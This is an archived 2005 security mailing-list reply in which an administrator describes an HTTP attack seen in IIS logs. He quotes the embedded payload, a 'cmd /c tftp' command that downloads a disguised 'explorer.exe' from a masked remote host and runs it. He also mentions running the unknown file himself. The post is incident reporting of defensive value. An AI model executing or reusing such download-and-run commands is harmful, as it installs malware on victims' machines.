Re: Re: New http attack?

phil_at_ramtronik.com
Date: 06/20/05

  • Next message: phil_at_ramtronik.com: "Re: Re: New http attack?"
    Date: 19 Jun 2005 22:14:59 -0000
    To: incidents@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) Hello,

    saw your post after considerable searching for the same mysterious 'get / 401' errors in my IIS log. I managed to get a full capture of the communication, further down from the 'QUFB' repetition was an embedded string:

    cmd /c tftp -i x.x.x.x GET explorer.exe
    start explorer.exe
    exit

    have hidden IP for obvious reasons. I managed to download the file myself manually, and submitted to symantec, as my virus checker didnt flag it. incidentally, i ran the file, and it wasn't explorer, though i dont know what it is.

    Phil


  • Next message: phil_at_ramtronik.com: "Re: Re: New http attack?"

    Relevant Pages

    • Re: Davenport Lyons - Watchdog Report
      ... those reasons actually did apply to him. ... How do you know its his connection, ... router or cable/dsl modem ... (note we dont ilegally download) ...
      (uk.legal)
    • Re: RMMGA CD?
      ... but I think for practical reasons this should ... If folks don't have high speed or are unable to download for other ... I have all the previous sets, and I can take them out and play them to friends, play them in my car, lots of things that I like to do. ... I don't own am mp3 player. ...
      (rec.music.makers.guitar.acoustic)
    • RE: How does a web site harvest user names
      ... and then executed that download, you may have been infected with one and ... A Freeware anti-spyware tool is Spybot Search and Destroy. ... I like both for their own reasons so use them both. ... > was surfing the other day. ...
      (microsoft.public.windowsxp.security_admin)
    • Re: [opensuse] Windows vs. Suse OO docuent file size
      ... I have to convert the files to PDF files for two reasons, ... file size of the Word/PDF conversion is 97kb, ... otherwise it takes too long for the dialup users to ... download the document. ...
      (SuSE)
    • Re: Can anyone suggest a good web development package for mixed design of PHP HTML etc.
      ... that new fangled realtime update stuff ... I'm wondering the reasons why you might want a realtime editor, ... ready for download. ... This is a full web development environment; ...
      (comp.lang.php)